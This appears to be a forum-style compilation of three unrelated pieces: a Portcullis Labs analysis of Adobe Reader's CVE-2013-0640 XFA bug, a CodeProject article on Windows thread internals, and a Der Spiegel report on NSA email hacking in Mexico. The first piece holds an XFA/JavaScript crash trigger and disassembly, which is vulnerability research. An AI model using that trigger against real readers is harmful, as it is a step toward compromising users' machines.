Adobe Reader is an application developed by Adobe Systems to view files in Portable Document Format (PDF). Adobe XML Forms Architecture (XFA) is a set of XML specifications for forms embedded in a PDF document. They were first introduced in the PDF 1.5 file format specification and are not compatible with AcroForms. The form itself is saved inside the PDF. The bug is triggered when the form objects are manipulated in a specific way.

[h=2]Binary Information[/h]
[TABLE]
[TR][TD]Name:[/TD][TD]AcroForm_api[/TD][/TR]
[TR][TD]Base address:[/TD][TD]0x20800000[/TD][/TR]
[TR][TD]File version:[/TD][TD]9.5.0.270[/TD][/TR]
[TR][TD]Default path:[/TD][TD]C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api[/TD][/TR]
[/TABLE]

[h=2]Analysis[/h]
[h=3]Trigger[/h]
The proof of concept consists of an embedded XFA form that is manipulated using JavaScript. The form contains two subforms: the first contains a choiceList object, the second a simple draw object.

<template xmlns="http://www.xfa.org/schema/xfa-template/2.8/">
  <subform name="form1">
    <pageSet>
      <pageArea name="page1">
        <contentArea />
        <subform>
          <field name="field0">
            <ui><choiceList></choiceList></ui>
          </field>
        </subform>
      </pageArea>
    </pageSet>
    <subform>
      <draw name="rect1" />
    </subform>
  </subform>
</template>

To trigger the bug, the JavaScript code first saves a reference to the choiceList object for later use. It then changes the keep.previous property of the draw object in the second subform to contentArea. Once that is done, the choiceList object is re-attached to the first subform through the ui node's oneOfChild property. This triggers the bug.

function Trigger() {
    MessWithTheMemory(); // heap grooming helper from the PoC; its body is not part of this article
    xfa.resolveNode("xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#ui").oneOfChild = choiceList;
}

var choiceList = null;

function Start() {
    choiceList = xfa.resolveNode("xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#ui[0].#choiceList[0]");
    xfa.resolveNode("xfa[0].form[0].form1[0].#subform[0].rect1").keep.previous = "contentArea";
    ddd = app.setTimeOut("Trigger();", 1);
}

Start();

[h=3]Binary analysis[/h]
Adobe Reader crashes in the AcroForm_api module. Just before the crash a function located at address 0x20907FA0 is called; for convenience this function is named UseTheUninitializedValue. It first calls a function at 0x209D76AE, named GetTheBrokenObject, and then increments a field of the returned object, probably a reference count. Finally the field at offset 0x3c is evaluated: if it is not NULL, a function at 0x209063B4, named crash_here, is called with that field as its this pointer.

.text:20907FA0 UseTheUninitializedValue
.text:20907FA0
.text:20907FA0 var_10 = dword ptr -10h
.text:20907FA0 var_4 = dword ptr -4
.text:20907FA0 arg_0 = dword ptr 8
.text:20907FA0 arg_4 = dword ptr 0Ch
.text:20907FA0 arg_8 = dword ptr 10h
.text:20907FA0
.text:20907FA0 push 4
.text:20907FA2 mov eax, offset sub_20CE45C9
.text:20907FA7 call __EH_prolog3
.text:20907FAC mov ebx, ecx
.text:20907FAE and [ebp+var_10], 0
.text:20907FB2 push [ebp+arg_8]
.text:20907FB5 lea eax, [ebp+arg_8]
.text:20907FB8 push [ebp+arg_4]
.text:20907FBB push eax
.text:20907FBC call GetTheBrokenObject // Get the uninitialized object from here.
.text:20907FC1 mov esi, [eax]
.text:20907FC3 test esi, esi
.text:20907FC5 mov [ebp+arg_4], esi
.text:20907FC8 jz short loc_20907FCD
.text:20907FCA inc dword ptr [esi+4] // Reference counter?
.text:20907FCD
.text:20907FCD loc_20907FCD:
.text:20907FCD lea ecx, [ebp+arg_8]
.text:20907FD0 mov [ebp+var_4], 1
.text:20907FD7 call sub_208A7FA1
.text:20907FDC mov edi, [ebx+3Ch]
.text:20907FDF test edi, edi
.text:20907FE1 jz short loc_20908012
.text:20907FE3 cmp dword ptr [esi+3Ch], 0 // If 0, skip the call.
.text:20907FE7 jz short loc_20907FF2
.text:20907FE9 mov ecx, [esi+3Ch] // Uninitialized memory here.
.text:20907FEC push ebx
.text:20907FED call crash_here

The value read from ESI+0x3c is used as a pointer. Since the value is garbage, Adobe Reader crashes when dereferencing it.

.text:209063B4 crash_here
.text:209063B4
.text:209063B4 arg_0 = dword ptr 4
.text:209063B4
.text:209063B4 push esi
.text:209063B5 push edi
.text:209063B6 mov edi, ecx // EDI is invalid.
.text:209063B8 mov esi, [edi+40h]
.text:209063BB test esi, esi
.text:209063BD jz short loc_209063FE
...
.text:209063FE loc_209063FE:
.text:209063FE
.text:209063FE pop edi
.text:209063FF pop esi
.text:20906400 retn 4
.text:20906400 crash_here endp

To find out why EDI contains an invalid value we need to go back to the constructor of the object. It can be found at 0x209D8D71, in a function named InitializeBrokenObject. As the disassembly shows, the constructor sets the vtable and the fields at offsets 0x0c, 0x10, 0x24, 0x28 and 0x2c to 0x38, but never writes the field at 0x3c of the new object; the only store to a +0x3c slot (mov [ecx+3Ch], esi) goes into the object passed as the second argument, not into the object being constructed.

.text:209D8D71 InitializeBrokenObject
.text:209D8D71
.text:209D8D71 arg_0 = dword ptr 4
.text:209D8D71 arg_4 = dword ptr 8
.text:209D8D71 arg_8 = dword ptr 0Ch
.text:209D8D71
.text:209D8D71 push esi
.text:209D8D72 push [esp+4+arg_0]
.text:209D8D76 mov esi, ecx
.text:209D8D78 call sub_209E7137 // ECX comes from the second argument.
.text:209D8D7D mov ecx, [esp+4+arg_4] // vtable.
.text:209D8D81 mov dword ptr [esi], offset broken_object
.text:209D8D87 mov eax, [ecx]
.text:209D8D89 xor edx, edx
.text:209D8D8B cmp eax, edx
.text:209D8D8D mov [esi+24h], eax
.text:209D8D90 jz short loc_209D8D95
.text:209D8D92 inc dword ptr [eax+4]
.text:209D8D95
.text:209D8D95 loc_209D8D95: // Offset 0x3c is not set.
.text:209D8D95 mov eax, [esp+4+arg_8]
.text:209D8D99 mov [esi+2Ch], eax
.text:209D8D9C mov [esi+30h], edx
.text:209D8D9F mov [esi+34h], edx
.text:209D8DA2 mov [esi+38h], edx
.text:209D8DA5 mov eax, off_20E93D74
.text:209D8DAA and dword ptr [esi+28h], 0FFFFFFF0h
.text:209D8DAE mov [esi+0Ch], eax
.text:209D8DB1 mov dword ptr [esi+10h], 0C9h
.text:209D8DB8 mov ecx, [ecx]
.text:209D8DBA cmp ecx, edx
.text:209D8DBC jz short loc_209D8DC1
.text:209D8DBE mov [ecx+3Ch], esi
.text:209D8DC1
.text:209D8DC1 loc_209D8DC1:
.text:209D8DC1 mov eax, esi
.text:209D8DC3 pop esi
.text:209D8DC4 retn 0Ch
.text:209D8DC4 InitializeBrokenObject endp

Depending on the previous contents of the allocation, the value at ESI+0x3c varies. If it happens to be 0, the call is skipped and nothing happens; otherwise the stale value is used as a pointer and the process may crash.

[h=2]Conclusion[/h]
This concludes the detailed analysis of the bug. The next goal is to replace the uninitialized data with fully controlled values and to leverage the bug into code execution. This involves a bit of heap massaging and will be the main focus of the second article.

[h=2]References[/h]
Adobe's advisory: APSA13-02
Download target version: Adobe Acrobat 10 for Windows
XFA Specification

Source: CVE-2013-0640: Adobe Reader XFA oneOfChild Un-initialized memory vulnerability (part 1) | Portcullis Labs
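The constructor-leaves-a-field-unset pattern analysed above, modelled in plain C as an added example (this is neither Portcullis Labs' code nor Adobe's). The structure layout follows the offsets InitializeBrokenObject writes; the field and function names, the 0x40 object size and the single-slot recycling allocator are assumptions made so that the stale contents are deterministic. The 0x41414141 fill is a constructed stand-in for whatever the previous tenant of the heap block left behind. The hardened constructor shows the one-line fix: clear the allocation before assigning fields.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical layout: one 32-bit slot per offset the constructor touches.
 * Names are illustrative; only the offsets come from the disassembly. */
struct xfa_obj {
    uint32_t vtable;                     /* +0x00 */
    uint32_t refcount;                   /* +0x04 */
    uint32_t unused_08;
    uint32_t field_0c;                   /* +0x0c */
    uint32_t field_10;                   /* +0x10 */
    uint32_t unused_14, unused_18, unused_1c, unused_20;
    uint32_t parent;                     /* +0x24 */
    uint32_t flags;                      /* +0x28 */
    uint32_t field_2c, field_30, field_34, field_38;
    uint32_t link_3c;                    /* +0x3c: read as a 'this' pointer, never written */
};

/* Single recycled heap slot (assumed 0x40 bytes), so the stale contents
 * are fully deterministic instead of depending on the real allocator. */
static union {
    struct xfa_obj obj;
    uint32_t words[sizeof(struct xfa_obj) / sizeof(uint32_t)];
} slot;

/* Constructed stand-in for what the previous tenant of the block left behind. */
static void fill_previous_tenant(uint32_t pattern)
{
    for (size_t i = 0; i < sizeof slot.words / sizeof slot.words[0]; i++)
        slot.words[i] = pattern;
}

static struct xfa_obj *alloc_recycled(void) { return &slot.obj; }

/* Mirrors InitializeBrokenObject: every field except +0x3c is assigned. */
static struct xfa_obj *ctor_as_shipped(struct xfa_obj *o, uint32_t parent, uint32_t arg8)
{
    o->vtable   = 0x20E90000u;   /* stand-in for 'offset broken_object' */
    o->parent   = parent;        /* mov [esi+24h], eax */
    o->field_2c = arg8;          /* mov [esi+2Ch], eax */
    o->field_30 = o->field_34 = o->field_38 = 0;
    o->flags   &= 0xFFFFFFF0u;   /* and [esi+28h], 0FFFFFFF0h: also reads stale bits */
    o->field_0c = 0x20E93D74u;   /* off_20E93D74 */
    o->field_10 = 0xC9u;
    return o;                    /* link_3c keeps whatever was in the block */
}

/* Hardened variant: clear the whole allocation before assigning fields. */
static struct xfa_obj *ctor_fixed(struct xfa_obj *o, uint32_t parent, uint32_t arg8)
{
    memset(o, 0, sizeof *o);
    return ctor_as_shipped(o, parent, arg8);
}

/* Mirrors UseTheUninitializedValue: a non-zero +0x3c is trusted as a pointer
 * and would become ECX ('this') for crash_here. Returns 1 if the call would
 * happen, storing the would-be pointer in *target. */
static int use_object(const struct xfa_obj *o, uint32_t *target)
{
    if (o->link_3c == 0)         /* cmp [esi+3Ch], 0 / jz: call skipped */
        return 0;
    *target = o->link_3c;        /* mov ecx, [esi+3Ch] */
    return 1;
}

/* Run one scenario; returns the pointer crash_here would receive, or 0. */
uint32_t run_scenario(int hardened, uint32_t previous_contents)
{
    fill_previous_tenant(previous_contents);
    struct xfa_obj *o = alloc_recycled();
    if (hardened) ctor_fixed(o, 0, 0); else ctor_as_shipped(o, 0, 0);
    uint32_t target = 0;
    return use_object(o, &target) ? target : 0;
}

int main(void)
{
    printf("shipped ctor, dirty block : this = 0x%08x\n", run_scenario(0, 0x41414141u));
    printf("shipped ctor, zeroed block: this = 0x%08x\n", run_scenario(0, 0));
    printf("fixed ctor,   dirty block : this = 0x%08x\n", run_scenario(1, 0x41414141u));
    return 0;
}
```

With a dirty block the shipped constructor hands crash_here a this pointer made entirely of the previous tenant's bytes, which is exactly the value the second article sets out to control through heap massaging; with a zeroed block the jz path is taken and nothing happens, matching the "if it is 0, the call is skipped" observation above.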
-
Internals of Windows Thread
By Mahesh Bailwal, 21 Oct 2013

Introduction

In today's programming world multi-threading has become an integral part of any programming language, whether it is .NET, Java or C++. To write highly responsive and scalable applications you must use the power of multi-threaded programming. While working on the .NET Framework I came across various Framework Class Libraries (FCL) for parallel task processing, such as the Task Parallel Library (TPL), Parallel LINQ (PLINQ), task factories, the thread pool and the asynchronous programming model, all of which behind the scenes use Windows threads to achieve parallelism. Understanding the basic structure of a Windows thread always helps in implementing and understanding advanced features like TPL and PLINQ, and helps you visualize how multiple threads work together in a system, especially when you are troubleshooting a multi-threaded application. In this article I would like to share some basics about Windows threads which may help you understand how the operating system implements them.

What a Windows Thread Consists Of

Let's start by looking at the basic components of a thread. There are three:

Thread Kernel Object
Stack
TEB

Windows Thread Components

Together these three components make up a Windows thread. I explain each of them below, but before looking at them let's have a brief introduction to the Windows kernel and kernel objects, as these are the most important parts of the Windows operating system.

What Is the Operating System Kernel

The kernel is the main component of any operating system. It is a bridge between applications and hardware: it provides a layer of abstraction through which applications can interact with hardware. The kernel is the part of the operating system that loads first, and it remains in physical memory.
The kernel's primary function is to manage the computer's hardware and resources and to allow other programs to run and use those resources. To learn more about the kernel visit the link below. http://en.wikipedia.org/wiki/Kernel_(computing)

What Are Kernel Objects

The kernel needs to maintain a lot of data about numerous resources such as processes, threads and files. For that the kernel uses "kernel data structures" known as kernel objects. Each kernel object is simply a memory block allocated by the kernel and accessible only to the kernel. This memory block is a data structure whose members maintain information about the object. Some members (security descriptor, usage count, and so on) are the same across all object types, but most data members are specific to the type of kernel object. The kernel creates and manipulates several types of kernel objects, such as process objects, thread objects, event objects, file objects, file-mapping objects, I/O completion port objects, job objects, mutex objects, pipe objects and semaphore objects.

Winobj Screenshot

If you are curious to see the list of all the kernel object types you can use the free WinObj tool from Sysinternals, available at the link below. WinObj

Thread Kernel Object

The first and most basic component of a Windows thread is the thread kernel object. For every thread in the system the operating system creates one thread kernel object, which it uses for managing and scheduling that thread. The kernel object is also where the system keeps statistical information about the thread. Below are some of the important properties of the thread kernel object.

Thread Context

Each thread kernel object contains a set of CPU registers, called the thread's context. The context reflects the state of the thread's CPU registers when the thread last executed. The set of CPU registers for the thread is saved in a CONTEXT structure.
The instruction pointer and the stack pointer are the two most important registers in the thread's context. The stack pointer holds the address of the top of the stack, inside the stack frame of the function currently executing on the thread; the instruction pointer holds the address of the next instruction the CPU will execute. The operating system uses this saved context when performing a thread context switch. A context switch is the process of storing and restoring the state (context) of a thread so that execution can be resumed from the same point at a later time.

The table below lists some of the other important information about the thread that is held in the thread kernel object.

[TABLE=class: ArticleTable]
[TR][TD]Property Name[/TD][TD]Description[/TD][/TR]
[TR][TD]CreateTime[/TD][TD]The time when the thread was created.[/TD][/TR]
[TR][TD]ThreadsProcess[/TD][TD]A pointer to the EPROCESS structure of the process that owns this thread.[/TD][/TR]
[TR][TD]StackBase[/TD][TD]The base address of this thread's stack.[/TD][/TR]
[TR][TD]StackLimit[/TD][TD]The end of the thread's kernel-mode stack.[/TD][/TR]
[TR][TD]TEB[/TD][TD]A pointer to the thread's environment block.[/TD][/TR]
[TR][TD]State[/TD][TD]The thread's current state.[/TD][/TR]
[TR][TD]Priority[/TD][TD]The thread's current priority.[/TD][/TR]
[TR][TD]ContextSwitches[/TD][TD]The number of context switches the thread has gone through.[/TD][/TR]
[TR][TD]WaitTime[/TD][TD]The time until a wait will expire.[/TD][/TR]
[TR][TD]Queue[/TD][TD]A queue for this thread.[/TD][/TR]
[TR][TD]Preempted[/TD][TD]Whether the thread will be preempted or not.[/TD][/TR]
[TR][TD]Affinity[/TD][TD]The thread's kernel affinity.[/TD][/TR]
[TR][TD]KernelTime[/TD][TD]The time the thread has spent in kernel mode.[/TD][/TR]
[TR][TD]UserTime[/TD][TD]The time the thread has spent in user mode.[/TD][/TR]
[TR][TD]ImpersonationInfo[/TD][TD]A pointer to a structure used when the thread is impersonating.[/TD][/TR]
[TR][TD]SuspendCount[/TD][TD]How many times the thread has been suspended.[/TD][/TR]
[/TABLE]

Stack

The second basic component of a thread is the stack. Once the thread kernel object has been created, the system allocates memory for the thread's stack. Every thread has its own stack, which is used for the local variables of functions and for passing arguments to functions executing on that thread. When a function executes it may push some of its state, such as arguments and local variables, onto the top of the stack; when the function exits it is responsible for removing that data from the stack. The stack also stores return addresses, so that a return statement can continue at the correct location in the caller.

The operating system allocates two stacks for every thread: a user-mode stack and a kernel-mode stack.

User-mode stack

The user-mode stack is used for local variables and arguments passed to methods. It also contains the return address indicating what the thread should execute next when the current method returns. By default, Windows reserves 1 MB of address space for each thread's user-mode stack.

Kernel-mode stack

The kernel-mode stack is used when application code passes arguments to a kernel function in the operating system. For security reasons, Windows copies any arguments passed from user-mode code to the kernel from the thread's user-mode stack to the thread's kernel-mode stack.
Once copied, the kernel can validate the arguments' values, and since application code cannot access the kernel-mode stack, the application cannot modify the arguments after they have been validated and the kernel has begun to operate on them (this copy is what closes the time-of-check-to-time-of-use window on user-supplied parameters). In addition, the kernel calls functions within itself and uses the kernel-mode stack to pass its own arguments, to store a function's local variables and to store return addresses. The kernel-mode stack is 12 KB on 32-bit Windows and 24 KB on 64-bit Windows.

You can learn more about thread stacks at the following links:
Kernel Space Definition
Stack-based memory allocation - Wikipedia, the free encyclopedia
Call stack - Wikipedia, the free encyclopedia

Thread Environment Block (TEB)

Another important data structure used by every thread is the Thread Environment Block (TEB). The TEB is a block of memory allocated and initialized in user mode (address space that application code can access directly). The TEB consumes one page of memory (4 KB on x86 and x64 CPUs). One of the important pieces of information the TEB contains is the exception-handling data used by Microsoft Structured Exception Handling (SEH): the TEB holds the head of the thread's exception-handler chain. Each try block that the thread enters inserts a node at the head of this chain, and the node is removed when the thread leaves the try block. You can learn more about SEH at the link below.
A Crash Course on the Depths of Win32 Structured Exception Handling, MSJ January 1997

In addition, the TEB contains the thread-local storage data. In multi-threaded applications there often arises the need to maintain data that is unique to a thread; the place where this thread-specific data is stored is called thread-local storage. You can learn more about thread-local storage at the link below.
http://msdn.microsoft.com/en-us/library/windows/desktop/ms686749(v=vs.85).aspx

The table below lists a few important properties of the TEB.

[TABLE=class: ArticleTable]
[TR][TD]Property Name[/TD][TD]Description[/TD][/TR]
[TR][TD]ThreadLocalStorage[/TD][TD]The thread-specific data.[/TD][/TR]
[TR][TD]ExceptionList[/TD][TD]The exception handler list used by SEH.[/TD][/TR]
[TR][TD]ExceptionCode[/TD][TD]The last exception code generated by the thread.[/TD][/TR]
[TR][TD]LastErrorValue[/TD][TD]The last error value (as returned by GetLastError) for the thread.[/TD][/TR]
[TR][TD]CountOwnedCriticalSections[/TD][TD]The number of critical sections (a synchronization mechanism) the thread owns.[/TD][/TR]
[TR][TD]IsImpersonating[/TD][TD]A flag indicating whether the thread is impersonating.[/TD][/TR]
[TR][TD]ImpersonationLocale[/TD][TD]The locale ID the thread is impersonating.[/TD][/TR]
[/TABLE]

Thread kernel object as thread handle

The system keeps all the information required for thread execution and scheduling inside the thread kernel object. In addition, the operating system stores the address of the thread's stack and of its TEB in the thread kernel object, as shown in the figure below.

Thread kernel object mapping

The thread kernel object is the single handle through which the operating system accesses all the information about a thread, and it is what the system uses for thread execution and scheduling.

Thread State

Each thread exists in a particular execution state at any given time. The operating system stores the state of the thread in the "State" field of the thread kernel object.
The operating system uses the following states, which are the ones relevant to performance:

- Running - the thread is using a CPU
- Blocked - the thread is waiting for input
- Ready - the thread is ready to run (neither Blocked nor Running)
- Exited - the thread has exited but has not yet been destroyed

Thread State Diagram

Thread Scheduler Queues

The operating system's thread scheduler keeps thread kernel objects in different queues depending on the state of the thread:

Ready queue - The scheduler maintains a list of the threads in the Ready state that can be scheduled on a CPU. The list is often sorted, and there is generally one queue per CPU.

Waiting queues - A thread in the Blocked state is put in a wait queue. A few examples of what causes a thread to block:
- the thread kernel object has a suspend count greater than 0, meaning the thread is suspended;
- the thread is waiting for a lock to be released;
- the thread is waiting for a reply from a device, e.g. disk, console or network.

Exited queue - A thread in the Exited state is put in this queue.

The thread scheduler uses a doubly linked list for these queues: a list head points to the collection of list entries, and each entry points to the next and previous entries in the list.

Thread kernel object doubly link list

The scheduler moves threads between queues when a thread's state changes, e.g. a thread moves from a wait queue to the ready queue on wake-up.

How the OS Runs Threads

As we already know, the thread's context structure is kept inside the thread's kernel object. This context reflects the state of the thread's CPU registers when the thread was last executing. Every 20 milliseconds or so, the operating system's thread scheduler looks at the thread kernel objects currently in the ready queue (a doubly linked list). It selects one of them and loads the CPU's registers with the values that were last saved in that thread's context. This action is called a context switch.
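The queue mechanics described above, as an added illustration in C that is not Windows code and not part of the original article. The list operations follow the intrusive LIST_ENTRY pattern the Windows kernel uses for its dispatcher lists (InsertTailList, RemoveEntryList and CONTAINING_RECORD), and the thread object is a toy with only the fields named in the table above: the names, the single scheduler with one ready, one wait and one exited list, and the round-robin pick are assumptions made for the demonstration. Every state change is a move from one list to another, a running thread sits in no list at all, and a suspended thread stays in the wait list until its suspend count drops back to zero.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Intrusive doubly-linked list in the style of the kernel's LIST_ENTRY:
 * the links live inside the thread object, and CONTAINING_RECORD walks
 * back from a link to the object that embeds it. */
struct list_entry { struct list_entry *flink, *blink; };

#define CONTAINING_RECORD(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

static void list_init(struct list_entry *head) { head->flink = head->blink = head; }
static int  list_empty(const struct list_entry *head) { return head->flink == head; }

static void insert_tail(struct list_entry *head, struct list_entry *e)
{
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

static void remove_entry(struct list_entry *e)
{
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    e->flink = e->blink = NULL;      /* mark the entry as unlinked */
}

static size_t list_count(const struct list_entry *head)
{
    size_t n = 0;
    for (const struct list_entry *e = head->flink; e != head; e = e->flink) n++;
    return n;
}

enum thread_state { READY, RUNNING, BLOCKED, EXITED };

/* Toy thread kernel object (hypothetical): a few fields from the table. */
struct kthread {
    uint32_t          id;
    enum thread_state state;
    uint32_t          context_switches;
    uint32_t          suspend_count;
    struct list_entry entry;         /* links the thread into at most one queue */
};

struct scheduler {
    struct list_entry ready, waiting, exited;
    struct kthread   *current;       /* the thread on the CPU, in no queue */
};

static void sched_init(struct scheduler *s)
{
    list_init(&s->ready); list_init(&s->waiting); list_init(&s->exited);
    s->current = NULL;
}

/* Every state change is a move between queues; RUNNING lives in no queue. */
static void set_state(struct scheduler *s, struct kthread *t, enum thread_state st)
{
    if (t->entry.flink) remove_entry(&t->entry);
    t->state = st;
    if (st == READY)   insert_tail(&s->ready,   &t->entry);
    if (st == BLOCKED) insert_tail(&s->waiting, &t->entry);
    if (st == EXITED)  insert_tail(&s->exited,  &t->entry);
}

static void admit(struct scheduler *s, struct kthread *t)
{
    t->entry.flink = t->entry.blink = NULL;
    set_state(s, t, READY);
}

static void block_thread(struct scheduler *s, struct kthread *t) { set_state(s, t, BLOCKED); }
static void wake_thread(struct scheduler *s, struct kthread *t)
{
    if (t->suspend_count == 0) set_state(s, t, READY);   /* suspended threads keep waiting */
}
static void suspend_thread(struct scheduler *s, struct kthread *t) { t->suspend_count++; set_state(s, t, BLOCKED); }
static void resume_thread(struct scheduler *s, struct kthread *t)
{
    if (t->suspend_count > 0 && --t->suspend_count == 0) set_state(s, t, READY);
}
static void exit_thread(struct scheduler *s, struct kthread *t) { set_state(s, t, EXITED); }

/* Quantum expiry: the running thread goes to the tail of the ready queue
 * (this is where its registers would be saved into its CONTEXT) and the
 * head of the ready queue is loaded onto the CPU. */
static struct kthread *context_switch(struct scheduler *s)
{
    if (s->current && s->current->state == RUNNING) set_state(s, s->current, READY);
    if (list_empty(&s->ready)) { s->current = NULL; return NULL; }
    struct kthread *next = CONTAINING_RECORD(s->ready.flink, struct kthread, entry);
    remove_entry(&next->entry);
    next->state = RUNNING;
    next->context_switches++;
    s->current = next;
    return next;
}

int main(void)
{
    struct scheduler s; sched_init(&s);
    struct kthread t[3] = { {1}, {2}, {3} };
    for (int i = 0; i < 3; i++) admit(&s, &t[i]);
    for (int tick = 0; tick < 4; tick++) {
        struct kthread *cur = context_switch(&s);
        printf("tick %d: thread %u running, %zu ready, %zu waiting\n",
               tick, cur->id, list_count(&s.ready), list_count(&s.waiting));
        if (tick == 1) block_thread(&s, cur);    /* thread 2 starts waiting for I/O */
        if (tick == 2) wake_thread(&s, &t[1]);   /* the I/O completed */
    }
    return 0;
}
```

The point of the intrusive layout is the one forensic tools rely on: given only the address of a list entry found in a queue, CONTAINING_RECORD recovers the whole thread object, which is exactly how a debugger walks a KTHREAD list from its head.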
At this point, the thread is executing code and manipulating data in its process's address space. After another 20 milliseconds or so, the scheduler saves the CPU's registers back into the thread's context. The scheduler again examines the remaining thread kernel objects in the ready queue, selects another thread's kernel object, loads that thread's context into the CPU's registers, and continues.

Thread Scheduler Diagram

This cycle of loading a thread's context, letting the thread run, saving the context, and repeating begins when the system boots and continues until the system is shut down.

Processes and Threads

One more thing I would like to share is the relationship between threads and processes. Every process requires at least one thread. A process never executes anything; it is simply a container for threads. Threads are always created in the context of some process and live their entire life within that process. What this really means is that a thread executes code and manipulates data within its process's address space. So if two or more threads are running in the context of a single process, they share a single address space: they can execute the same code and manipulate the same data.

The process gives structural information about the in-memory copy of your executable program, such as which memory is currently allocated, which program is running, how much memory it is using, and so on. The process itself, however, does not execute any code. It simply allows the OS (and the user) to know which executable program a certain thread belongs to. It also owns the handles, security rights and privileges that its threads create and use. Code, therefore, actually runs in threads.

To understand this you can draw an analogy between processes and threads and a regular, everyday object: a house. A house is really a container, with certain attributes (such as the amount of floor space, the number of bedrooms, and so on).
If you look at it that way, the house doesn't actively do anything on its own; it's a passive object. This is effectively what a process is. The people living in the house are the active objects; they're the ones using the various rooms, watching TV, cooking, taking showers, and so on. That's how threads behave. Just as a house occupies an area of real estate, a process occupies memory. And just as a house's occupants are free to go into any room they want, a process's threads all have common access to that memory. A process, just like a house, has some well-defined borders. A person in a house has a pretty good idea when they're in the house and when they're not. A thread has a very good idea too: if it accesses memory within the process it can live; if it steps out of the bounds of the process's address space it gets killed (an access violation exception, which terminates the process if nothing handles it). This means that two threads running in different processes are effectively isolated from each other. If you want to learn more about processes and threads, please visit this link: Processes and Threads

Summary

In this article I tried to share basic information about how Windows manages threads, to the best of my knowledge. Please feel free to share your comments if you want me to add something, or if anything needs improvement or clarification.

References

CLR via C#, Third Edition (February 10, 2010) by Jeffrey Richter
Windows via C/C++, Fifth Edition (December 2007) by Jeffrey Richter and Christophe Nasarre
Introduction to NT Internals - Alex Ionescu's Blog
Processes and Threads

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

About the Author
Mahesh Bailwal
Software Developer (Senior)
India

Source: Internals of Windows Thread - CodeProject
-
[h=2]NSA Accessed Mexican President's Email[/h] By Jens Glüsing, Laura Poitras, Marcel Rosenbach and Holger Stark The NSA has been systematically eavesdropping on the Mexican government for years. It hacked into the president's public email account and gained deep insight into policymaking and the political system. The news is likely to hurt ties between the US and Mexico. The National Security Agency (NSA) has a division for particularly difficult missions. Called "Tailored Access Operations" (TAO), this department devises special methods for special targets. That category includes surveillance of neighboring Mexico, and in May 2010, the division reported its mission accomplished. A report classified as "top secret" said: "TAO successfully exploited a key mail server in the Mexican Presidencia domain within the Mexican Presidential network to gain first-ever access to President Felipe Calderon's public email account." According to the NSA, this email domain was also used by cabinet members, and contained "diplomatic, economic and leadership communications which continue to provide insight into Mexico's political system and internal stability." The president's office, the NSA reported, was now "a lucrative source." This operation, dubbed "Flatliquid," is described in a document leaked by whistleblower Edward Snowden, which SPIEGEL has now had the opportunity to analyze. The case is likely to cause further strain on relations between Mexico and the United States, which have been tense since Brazilian television network TV Globo revealed in September that the NSA monitored then-presidential candidate Enrique Peña Nieto and others around him in the summer of 2012. Peña Nieto, now Mexico's president, summoned the US ambassador in the wake of that news, but confined his reaction to demanding an investigation into the matter. 
Now, though, the revelation that the NSA has systematically infiltrated an entire computer network is likely to trigger deeper controversy, especially since the NSA's snooping took place during the term of Peña Nieto's predecessor Felipe Calderón, a leader who worked more closely with Washington than any other Mexican president before him. Brazil Also Targeted Reports of US surveillance operations have caused outrage in Latin America in recent months. Brazilian President Dilma Rousseff cancelled a planned trip to Washington five weeks ago and condemned the NSA's espionage in a blistering speech to the United Nations General Assembly. The US surveillance of politicians in Mexico and Brazil is not a one-off. Internal documents show these countries' leaders represent important monitoring targets for the NSA, with both Mexico and Brazil ranking among the nations high on an April 2013 list that enumerates the US' surveillance priorities. That list, classified as "secret," was authorized by the White House and "presidentially approved," according to internal NSA documents. The list ranks strategic objectives for all US intelligence services using a scale from "1" for high priority to "5" for low priority. In the case of Mexico, the US is interested primarily in the drug trade (priority level 1) and the country's leadership (level 3). Other areas flagged for surveillance include Mexico's economic stability, military capabilities, human rights and international trade relations (all ranked at level 3), as well as counterespionage (level 4). It's much the same with Brazil -- ascertaining the intentions of that country's leadership ranks among the stated espionage targets. Brazil's nuclear program is high on the list as well. When Brazilian President Rousseff took office in early 2011, one of her goals was to improve relations with Washington, which had cooled under her predecessor, the popular former labor leader Luiz Inácio Lula da Silva. 
Lula focused primarily on establishing closer ties with China, India and African nations, and even invited Iran's then-President Mahmoud Ahmadinejad to Brazil, in a snub to the US. President Barack Obama postponed a planned visit to the capital, Brasília, as a result. Rousseff, however, has distanced herself from Iran. And the first foreign minister to serve under her, Antonio Patriota, who recently resigned, was seen as friendly toward the US, maintaining good ties with his counterpart Hillary Clinton. Obama made a state visit to Brazil two years ago and Rousseff had planned to reciprocate with a visit to Washington this October. Then came the revelation that US authorities didn't stop short of spying on the president herself. According to one internal NSA presentation, the agency investigated "the communication methods and associated selectors of Brazilian President Dilma Rouseff and her key advisers." It also said it found potential "high-value targets" among her inner circle. Economic Motives? Rousseff believes Washington's reasons for employing such unfriendly methods are partly economic, an accusation that the NSA and its director, General Keith Alexander, have denied. Yet according to the leaked NSA documents, the US also monitored email and telephone communications at Petrobras, the oil corporation in which the Brazilian government holds a majority stake. Brazil possesses enormous offshore oil reserves. Just how intensively the US spies on its neighbors can be seen in another, previously unknown operation in Mexico, dubbed "Whitetamale" by the NSA. In August 2009, according to internal documents, the agency gained access to the emails of various high-ranking officials in Mexico's Public Security Secretariat that combats the drug trade and human trafficking. This hacking operation allowed the NSA not only to obtain information on several drug cartels, but also to gain access to "diplomatic talking-points." 
